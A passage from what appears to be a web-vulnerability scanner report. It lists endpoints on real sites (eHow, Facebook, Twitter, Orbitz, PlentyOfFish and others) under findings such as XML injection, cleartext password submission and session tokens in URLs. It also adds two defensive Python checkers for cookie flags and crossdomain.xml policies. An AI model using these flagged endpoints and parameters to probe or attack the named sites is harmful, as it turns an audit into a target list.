4.632. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [Referer HTTP header]

4.633. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [Referer HTTP header]

4.634. http://www.ehow.com/how_5381925_make-roof-rake.html [Referer HTTP header]

4.635. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [Referer HTTP header]

4.636. http://www.ehow.com/how_5809012_create-indoor-gardens.html [Referer HTTP header]

4.637. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [Referer HTTP header]

4.638. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [Referer HTTP header]

4.639. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [Referer HTTP header]

4.640. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [Referer HTTP header]

4.641. http://www.ehow.com/how_9191_program-rca-universal.html [Referer HTTP header]

4.642. http://www.ehow.com/internet/ [Referer HTTP header]

4.643. http://www.ehow.com/job-search-and-employment/ [Referer HTTP header]

4.644. http://www.ehow.com/lawn-and-garden/ [Referer HTTP header]

4.645. http://www.ehow.com/legal/ [Referer HTTP header]

4.646. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [Referer HTTP header]

4.647. http://www.ehow.com/list_7189463_grammar-check-tools.html [Referer HTTP header]

4.648. http://www.ehow.com/lose-weight/ [Referer HTTP header]

4.649. http://www.ehow.com/members.html [Referer HTTP header]

4.650. http://www.ehow.com/mental-health/ [Referer HTTP header]

4.651. http://www.ehow.com/music/ [Referer HTTP header]

4.652. http://www.ehow.com/parenting/ [Referer HTTP header]

4.653. http://www.ehow.com/personal-finance/ [Referer HTTP header]

4.654. http://www.ehow.com/pets-and-animals/ [Referer HTTP header]

4.655. http://www.ehow.com/photos/ [Referer HTTP header]

4.656. http://www.ehow.com/plant-care/ [Referer HTTP header]

4.657. http://www.ehow.com/plants/ [Referer HTTP header]

4.658. http://www.ehow.com/privacy.aspx [Referer HTTP header]

4.659. http://www.ehow.com/real-estate-and-investment/ [Referer HTTP header]

4.660. http://www.ehow.com/recipes/ [Referer HTTP header]

4.661. http://www.ehow.com/recreational-activities/ [Referer HTTP header]

4.662. http://www.ehow.com/relationships-and-family/ [Referer HTTP header]

4.663. http://www.ehow.com/search.aspx [Referer HTTP header]

4.664. http://www.ehow.com/share.html [Referer HTTP header]

4.665. http://www.ehow.com/site-map.html [Referer HTTP header]

4.666. http://www.ehow.com/sitemap.html [Referer HTTP header]

4.667. http://www.ehow.com/sports/ [Referer HTTP header]

4.668. http://www.ehow.com/terms_use.aspx [Referer HTTP header]

4.669. http://www.ehow.com/topic_227_take-pictures.html [Referer HTTP header]

4.670. http://www.ehow.com/topic_2488_lose-weight.html [Referer HTTP header]

4.671. http://www.ehow.com/topic_253_lose-weight-now.html [Referer HTTP header]

4.672. http://www.ehow.com/topic_3493_lose-weight-dieting.html [Referer HTTP header]

4.673. http://www.ehow.com/topic_363_winter-sports.html [Referer HTTP header]

4.674. http://www.ehow.com/topic_3818_flu-guide.html [Referer HTTP header]

4.675. http://www.ehow.com/topic_3990_home-security-systems-guide.html [Referer HTTP header]

4.676. http://www.ehow.com/topic_401_home-alarms.html [Referer HTTP header]

4.677. http://www.ehow.com/topic_4028_preparing-flu-season.html [Referer HTTP header]

4.678. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [Referer HTTP header]

4.679. http://www.ehow.com/topic_429_all-flu.html [Referer HTTP header]

4.680. http://www.ehow.com/topic_4989_photo-sharing-101.html [Referer HTTP header]

4.681. http://www.ehow.com/topic_49_treating-colds-flus.html [Referer HTTP header]

4.682. http://www.ehow.com/topic_5023_jog-lose-weight.html [Referer HTTP header]

4.683. http://www.ehow.com/topic_689_black-white-photos.html [Referer HTTP header]

4.684. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [Referer HTTP header]

4.685. http://www.ehow.com/topic_7853_floor-fountains-guide.html [Referer HTTP header]

4.686. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [Referer HTTP header]

4.687. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [Referer HTTP header]

4.688. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [Referer HTTP header]

4.689. http://www.ehow.com/toys-and-games/ [Referer HTTP header]

4.690. http://www.ehow.com/unavailable.aspx [Referer HTTP header]

4.691. http://www.ehow.com/us-travel/ [Referer HTTP header]

4.692. http://www.ehow.com/vacations-and-travel-planning/ [Referer HTTP header]

4.693. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [Referer HTTP header]

4.694. http://www.ehow.com/video_6976779_sensational-snacks.html [Referer HTTP header]

4.695. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [Referer HTTP header]

4.696. http://www.ehow.com/videos.html [Referer HTTP header]

4.697. http://www.ehow.com/weddings-and-parties/ [Referer HTTP header]

4.698. http://www.ehow.com/weight-management-and-body-image/ [Referer HTTP header]

4.699. http://www.ehow.com/winterize-a-garden/ [Referer HTTP header]

4.700. https://www.ehow.com/WebResource.axd [Referer HTTP header]

4.701. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css [Referer HTTP header]

4.702. https://www.ehow.com/forms/ [Referer HTTP header]

4.703. https://www.ehow.com/forms/PasswordRetrieval.aspx [Referer HTTP header]

4.704. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx [Referer HTTP header]

4.705. https://www.ehow.com/forms/signin.aspx [Referer HTTP header]

4.706. https://www.ehow.com/privacy.aspx [Referer HTTP header]

4.707. https://www.ehow.com/terms_use.aspx [Referer HTTP header]

4.708. http://blekko.com/join [name of an arbitrarily supplied request parameter]

4.709. http://blekko.com/login [name of an arbitrarily supplied request parameter]

4.710. http://seg.sharethis.com/getSegment.php [__stid cookie]

5. Cleartext submission of password

5.1. http://boardreader.com/my.html

5.2. http://clickaider.com/

5.3. http://it.toolbox.com/blogs/database-soup

5.4. http://it.toolbox.com/blogs/database-talk

5.5. http://it.toolbox.com/blogs/db2luw

5.6. http://it.toolbox.com/blogs/db2zos

5.7. http://it.toolbox.com/blogs/elsua

5.8. http://it.toolbox.com/blogs/juice-analytics

5.9. http://it.toolbox.com/blogs/minimalit

5.10. http://it.toolbox.com/blogs/penguinista-databasiensis

5.11. http://it.toolbox.com/blogs/ppmtoday

5.12. http://wp-superslider.com/

5.13. http://www.astaro.org/

5.14. http://www.ehow.com/account/simple_login.aspx

5.15. http://www.ehow.com/account/simple_register.aspx

5.16. http://www.evow.com/

5.17. http://www.evow.com/

5.18. http://www.facebook.com/

5.19. http://www.facebook.com/r.php

5.20. http://www.plentyoffish.com/

5.21. http://www.plentyoffish.com/inbox.aspx

5.22. http://www.plentyoffish.com/meetme.aspx

5.23. http://www.plentyoffish.com/needs_test.aspx

5.24. http://www.plentyoffish.com/poftest.aspx

5.25. http://www.plentyoffish.com/seriousintro.aspx

5.26. http://www.ratedesi.com/

5.27. http://www.ratedesi.com/

5.28. http://www.reddit.com/domain/static.2mdn.net/new/x22

5.29. http://www.reddit.com/domain/static.2mdn.net/new/x22

5.30. http://www.reddit.com/domain/static.2mdn.net/x22

5.31. http://www.reddit.com/domain/static.2mdn.net/x22

5.32. http://www.shape.com/workouts/articles/blood_sugar.html

5.33. http://www.shape.com/workouts/articles/workout_schedule.html

5.34. http://www.threatexpert.com/signin.aspx

5.35. http://www.threatexpert.com/signup.aspx

5.36. http://www.untraceableemail.net/boobitrap/eCheck.php

5.37. http://www.worldmastiffforum.com/

6. XML injection

6.1. http://services.money.msn.com/quoteservice/streaming [format parameter]

6.2. http://www.plentyoffish.com/member23010679.htm [ASP.NET_SessionId cookie]

6.3. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

6.4. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

6.5. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

7. SSL cookie without secure flag set

7.1. https://ads.pof.com/

7.2. https://careers.microsoft.com/

7.3. https://faq.orbitz.com/

7.4. https://faq.orbitz.com/app/answers/detail/a_id/15644

7.5. https://gc.synxis.com/xbe/rez.aspx

7.6. https://twitter.com/

7.7. https://twitter.com/about

7.8. https://twitter.com/about/contact

7.9. https://twitter.com/about/resources

7.10. https://twitter.com/account/complete

7.11. https://twitter.com/account/resend_password

7.12. https://twitter.com/login

7.13. https://twitter.com/privacy

7.14. https://twitter.com/sessions

7.15. https://twitter.com/sessions/change_locale

7.16. https://twitter.com/sessions/destroy

7.17. https://twitter.com/signup

7.18. https://twitter.com/tos

7.19. https://www.astaro.co.uk/beacon/(beid

7.20. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

7.21. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

7.22. https://www.astaro.com/user/login

7.23. https://www.astaro.de/beacon/(beid

7.24. https://www.astaro.net/beacon/(beid

7.25. https://www.orbitz.com/account/login

7.26. https://www.orbitz.com/account/registration

7.27. https://www.orbitz.com/trips/writeReview

7.28. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

7.29. https://login.facebook.com/

7.30. https://login.facebook.com/ajax/intl/language_dialog.php

7.31. https://login.facebook.com/help/

7.32. https://login.facebook.com/login.php

7.33. https://login.facebook.com/r.php

7.34. https://login.live.com/login.srf

7.35. https://maps-api-ssl.google.com/maps

7.36. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

7.37. https://sitesearch.omniture.com/center/

7.38. https://www.facebook.com/

7.39. https://www.facebook.com/2008/fbml

7.40. https://www.facebook.com/login.php

7.41. https://www.orbitz.com/Secure/SignIn

7.42. https://www.orbitz.com/Secure/ViewSecureCalendar

7.43. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

7.44. https://www.scanalert.com/RatingVerify
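
Both "SSL cookie without secure flag set" (this section) and "Cookie scoped to parent domain" (section 11 below) are decided from the Set-Cookie response header alone. The function below reproduces those two decisions as an added example for this report; it is not scanner code. The response URL and Set-Cookie values it inspects are constructed, and the `.test` hostnames are placeholders. It does not consult the public suffix list, so a Domain attribute a browser would refuse anyway (e.g. a bare TLD) is still reported as parent-scoped.

```python
"""Audit Set-Cookie headers for a missing Secure flag on TLS responses and
for cookies scoped to a parent domain of the responding host.

Added example; not scanner code. The headers below are constructed.
"""
from urllib.parse import urlsplit


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (cookie_name, {attr_lower: value_or_None})."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() if value else None
    return name, attrs


def domain_is_parent_of_host(host, cookie_domain):
    """True when the cookie Domain covers more hosts than the one that set it.

    host "login.example.test" with Domain ".example.test" -> True.
    The leading dot is ignored, as in RFC 6265 domain matching.
    """
    if not cookie_domain:
        return False          # host-only cookie: scoped to exactly this host
    dom = cookie_domain.lower().lstrip(".")
    host = host.lower()
    return host != dom and host.endswith("." + dom)


def audit_cookies(response_url, set_cookie_headers):
    """Return a list of (cookie_name, issue) for one response."""
    parts = urlsplit(response_url)
    issues = []
    for header in set_cookie_headers:
        name, attrs = parse_set_cookie(header)
        # Secure flag only matters when the cookie was set over TLS; without it
        # the browser will also send the cookie on any http:// request.
        if parts.scheme.lower() == "https" and "secure" not in attrs:
            issues.append((name, "set over TLS without the Secure flag"))
        domain = attrs.get("domain")
        if domain_is_parent_of_host(parts.hostname, domain):
            issues.append((name, "scoped to parent domain " + domain))
    return issues


# Constructed sample: one TLS response setting three cookies.
SAMPLE_URL = "https://login.example.test/session"
SAMPLE_HEADERS = [
    "sid=abc123; Path=/; HttpOnly",                                   # no Secure flag
    "pref=dark; Path=/; Secure; Domain=.example.test",                # parent-scoped
    "csrf=tok; Path=/; Secure; HttpOnly; Domain=login.example.test",  # clean
]

if __name__ == "__main__":
    for cookie, issue in audit_cookies(SAMPLE_URL, SAMPLE_HEADERS):
        print(f"{cookie}: {issue}")
```

Parent-domain scoping is only a problem when another host under that parent is less trusted (user content, a forgotten staging box, an acquired brand), which is why the scanner lists it as informational rather than as a vulnerability; the Secure-flag finding is actionable on its own for any session or authentication cookie.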

8. Session token in URL

8.1. https://admin.testandtarget.omniture.com/

8.2. https://admin.testandtarget.omniture.com/login_hal.css

8.3. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

8.4. https://admin.testandtarget.omniture.com/skins/omniture/images/adobe-lq.png

8.5. https://admin.testandtarget.omniture.com/skins/omniture/images/footer_gradient.gif

8.6. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_green_dash.gif

8.7. https://admin.testandtarget.omniture.com/skins/omniture/images/lgn_head_bg.png

8.8. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_headerbar.gif

8.9. https://admin.testandtarget.omniture.com/skins/omniture/images/omtr_lgn_left_panel.jpg

8.10. https://admin.testandtarget.omniture.com/skins/omniture/login.css

8.11. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

8.12. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html

8.13. http://api.demandbase.com/api/v1/ip.json

8.14. https://gc.synxis.com/xbe/rez.aspx

8.15. http://l.sharethis.com/pview

8.16. http://local.msn.com/

8.17. http://local.msn.com/hourly.aspx

8.18. http://local.msn.com/movies-events.aspx

8.19. http://local.msn.com/news.aspx

8.20. http://local.msn.com/restaurants.aspx

8.21. http://local.msn.com/sports.aspx

8.22. http://local.msn.com/ten-day.aspx

8.23. http://local.msn.com/weather.aspx

8.24. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard

8.25. https://my.omniture.com/p/suite/1.2/index.html

8.26. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

8.27. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

8.28. http://track.roiservice.com/track/LogToDb.asp.aspx

8.29. http://www.facebook.com/extern/login_status.php

9. Flash cross-domain policy

9.1. http://pics.plentyoffish.com/crossdomain.xml

9.2. http://pixel.facebook.com/crossdomain.xml

9.3. http://www.evow.com/crossdomain.xml
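
A "Flash cross-domain policy" finding means the host publishes a crossdomain.xml that lets SWF content from other origins read its responses with the user's cookies attached. The function below scores such a policy for the settings that make that dangerous; it is an added example written for this report, not scanner code, and the policy document it parses is constructed (the `.test` domain is a placeholder).

```python
"""Rate a Flash crossdomain.xml policy for over-permissive settings.

Added example for the "Flash cross-domain policy" finding class; not
scanner code. The policy below is constructed.
"""
import xml.etree.ElementTree as ET


def crossdomain_findings(policy_xml):
    """Return human-readable findings for one crossdomain.xml document.

    Three settings are checked:
      * allow-access-from domain="*" (or a subdomain wildcard), which lets any
        matching origin read responses with the victim's cookies;
      * secure="false", which additionally lets http:// SWFs read https:// data;
      * allow-http-request-headers-from domain="*", which lets arbitrary origins
        add custom request headers.
    """
    root = ET.fromstring(policy_xml)
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin can read '
                            "responses with the user's cookies")
        elif domain.startswith("*."):
            findings.append(f"allow-access-from {domain}: every subdomain is trusted")
        # The attribute defaults to true when omitted on an https policy.
        if el.get("secure", "true").lower() == "false":
            findings.append(f'allow-access-from {domain or "?"} secure="false": '
                            "http:// SWFs may read https:// content")
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": '
                            "arbitrary origins can send custom headers")
    return findings


# Constructed sample: a worst-case policy alongside a tight one.
PERMISSIVE_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-access-from domain="*.partner.test"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

TIGHT_POLICY = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.test"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for finding in crossdomain_findings(PERMISSIVE_POLICY):
        print("-", finding)
```

A wildcard policy is only harmless on a host that never returns anything tied to the visitor's session, which is why a static image host with domain="*" is a lower-priority finding than the same policy on a host that also serves authenticated pages; confirm which case applies before closing the finding.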

10. ASP.NET ViewState without MAC enabled

10.1. http://beta-ads.ace.advertising.com/

10.2. http://p.ace.advertising.com/

10.3. http://r1-ads.ace.advertising.com/

10.4. http://r1.ace.advertising.com/

10.5. http://www.ehow.com/account/simple_register.aspx

10.6. https://www.ehow.com/account/simple_register.aspx

10.7. https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx

11. Cookie scoped to parent domain

11.1. http://dev.twitter.com/

11.2. http://m.twitter.com/

11.3. http://sorry.google.com/sorry/Captcha

11.4. http://www.bing.com/travel/

11.5. http://www.bing.com/travel/deals/airline-ticket-deals.do

11.6. http://www.cafemom.com/group/416

11.7. http://www.cafemom.com/group/46574

11.8. http://www.directstartv.com/

11.9. http://www.faneuilhallmarketplace.com/

11.10. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

11.11. http://www.mywot.com/en/scorecard/2mdn.net

11.12. http://www.opensource.org/licenses/gpl-license.php

11.13. http://www.opensource.org/licenses/mit-license.php

11.14. http://www.pctools.com/free-antivirus/

11.15. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

11.16. http://www.trw.com/

11.17. http://a.rad.msn.com/ADSAdClient31.dll

11.18. http://ad-emea.doubleclick.net/click

11.19. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59

11.20. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

11.21. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

11.22. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

11.23. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

11.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage

11.25. http://ad.doubleclick.net/adj/dmd.ehow/gen

11.26. http://ad.doubleclick.net/click

11.27. http://ad.doubleclick.net/clk

11.28. http://adclick.g.doubleclick.net/aclk

11.29. http://ads.adbrite.com/adserver/vdi/762701

11.30. http://ads.revsci.net/adserver/ako

11.31. https://adwords.google.com/select/Login

11.32. http://api.bizographics.com/v1/profile.json

11.33. http://b.scorecardresearch.com/b

11.34. http://blog.facebook.com/blog.php

11.35. http://blogsearch.google.com/blogsearch

11.36. http://books.google.com/

11.37. http://books.google.com/books

11.38. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

11.39. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx

11.40. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx

11.41. http://businessonmain.msn.com/questions/default.aspx

11.42. http://businessonmain.msn.com/videos/coolrunnings.aspx

11.43. http://c.chango.com/collector/tag.js

11.44. http://c.statcounter.com/t.php

11.45. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy

11.46. http://code.google.com/apis/maps/terms.html

11.47. http://code.google.com/p/swfobject/

11.48. http://code.google.com/p/swfobject/wiki/documentation

11.49. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

11.50. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp

11.51. http://cspix.media6degrees.com/orbserv/hbpix

11.52. http://deals.msn.com/

11.53. http://developer.yahoo.com/yui/compressor/

11.54. http://developers.facebook.com/plugins/

11.55. http://dm.demdex.net/pixel/10236

11.56. http://dpm.demdex.net/demdot.jpg

11.57. http://ds.addthis.com/red/psi/p.json

11.58. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

11.59. http://edge.quantserve.com/quant.js

11.60. http://editorial.autos.msn.com/articles/default.aspx

11.61. http://editorial.autos.msn.com/blogs/autosblog.aspx

11.62. http://editorial.autos.msn.com/media/default.aspx

11.63. http://editorial.autos.msn.com/media/video/default.aspx

11.64. http://editorial.autos.msn.com/new-cars/default.aspx

11.65. http://editorial.autos.msn.com/used-cars/default.aspx

11.66. http://entertainment.msn.com/

11.67. http://entertainment.msn.com/news/

11.68. http://entertainment.msn.com/video/

11.69. http://groups.google.com/groups

11.70. http://health.msn.com/

11.71. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx

11.72. http://hit.clickaider.com/clickaider.js

11.73. http://hit.clickaider.com/pv

11.74. http://i.simpli.fi/dpx.js

11.75. http://ib.adnxs.com/getuidu

11.76. http://ib.adnxs.com/px

11.77. http://id.google.com/verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif

11.78. http://id.google.com/verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif

11.79. http://id.google.com/verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif

11.80. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

11.81. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

11.82. http://id.google.com/verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif

11.83. http://id.google.com/verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif

11.84. http://id.google.com/verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif

11.85. http://image2.pubmatic.com/AdServer/Pug

11.86. http://images.google.com/images

11.87. http://info.yahoo.com/w3c/p3p.xml

11.88. http://js.revsci.net/gateway/gw.js

11.89. http://khm0.google.com/kh/v/x3d78/x26

11.90. http://khm1.google.com/kh/v/x3d78/x26

11.91. http://khmdb0.google.com/kh

11.92. http://khmdb1.google.com/kh

11.93. http://kona32.kontera.com/KonaGet.js

11.94. http://latino.msn.com/

11.95. http://lifestyle.msn.com/

11.96. http://lifestyle.msn.com/relationships/

11.97. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx

11.98. http://lifestyle.msn.com/relationships/your-money-today/article.aspx

11.99. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx

11.100. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx

11.101. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

11.102. http://lifestyle.msn.com/your-look/

11.103. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx

11.104. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx

11.105. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx

11.106. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx

11.107. http://local.msn.com/

11.108. http://local.msn.com/hourly.aspx

11.109. http://local.msn.com/movies-events.aspx

11.110. http://local.msn.com/news.aspx

11.111. http://local.msn.com/restaurants.aspx

11.112. http://local.msn.com/sports.aspx

11.113. http://local.msn.com/ten-day.aspx

11.114. http://local.msn.com/weather.aspx

11.115. https://login.facebook.com/

11.116. https://login.facebook.com/ajax/intl/language_dialog.php

11.117. https://login.facebook.com/help/

11.118. https://login.facebook.com/login.php

11.119. https://login.facebook.com/r.php

11.120. https://maps-api-ssl.google.com/maps

11.121. http://media.fastclick.net/w/tre

11.122. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

11.123. http://movies.msn.com/

11.124. http://movies.msn.com/movies/article.aspx

11.125. http://movies.msn.com/new-on-dvd/movies/

11.126. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

11.127. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

11.128. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

11.129. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

11.130. http://movies.msn.com/showtimes/showtimes.aspx

11.131. http://movies.msn.com/the-rundown/the-guard/story_5/

11.132. http://mt2.google.com/mapstt

11.133. http://mt3.google.com/mapstt

11.134. http://music.msn.com/

11.135. http://music.msn.com/music/article.aspx

11.136. http://my.msn.com/

11.137. http://my.omniture.com/

11.138. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

11.139. http://news.google.com/news/story

11.140. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

11.141. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

11.142. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

11.143. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

11.144. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

11.145. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

11.146. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

11.147. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

11.148. http://picasaweb.google.com/lh/view

11.149. https://picasaweb.google.com/lh/view

11.150. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.151. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js

11.152. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js

11.153. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

11.154. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

11.155. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

11.156. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

11.157. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js

11.158. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

11.159. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

11.160. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

11.161. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

11.162. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js

11.163. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js

11.164. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

11.165. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

11.166. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

11.167. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

11.168. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js

11.169. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

11.170. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

11.171. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

11.172. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

11.173. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js

11.174. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

11.175. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

11.176. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

11.177. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

11.178. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js

11.179. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

11.180. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

11.181. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js

11.182. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

11.183. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

11.184. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js

11.185. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

11.186. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

11.187. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

11.188. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

11.189. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js

11.190. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js

11.191. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js

11.192. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

11.193. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

11.194. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js

11.195. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js

11.196. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js

11.197. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js

11.198. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js

11.199. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js

11.200. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js

